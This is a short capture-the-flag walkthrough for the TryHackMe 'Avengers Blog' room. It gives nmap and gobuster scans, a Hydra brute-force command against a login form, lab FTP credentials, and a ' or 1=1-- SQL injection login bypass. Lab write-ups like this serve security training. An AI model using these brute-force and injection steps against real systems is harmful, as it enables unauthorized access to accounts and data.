Avengers Blog

Room Link: https://tryhackme.com/room/avengers

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Kali

git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install

./hydra -l groot -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-post-form "/auth/:username=^USER^&password=^PASS^:F=Incorrect username" -V

Cookies

Get the flag with developer console by checking the cookie.

HTTP Headers

Enumeration and FTP

Kali

ftp $VICTIM
Username: groot
Password: iamgroot

GoBuster

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

SQL Injection

Username: ' or 1=1--
Password: ' or 1=1--

Remote Code Execution and Linux

PreviousAgent T NextMustacchio

Last updated 1 year ago

hashtagInitial Scan

hashtagScan all ports

hashtagCookies

hashtagHTTP Headers

hashtag

hashtagEnumeration and FTP

hashtagGoBuster

hashtagSQL Injection

hashtagRemote Code Execution and Linux

Initial Scan

Scan all ports

Cookies

HTTP Headers

Enumeration and FTP

GoBuster

SQL Injection

Remote Code Execution and Linux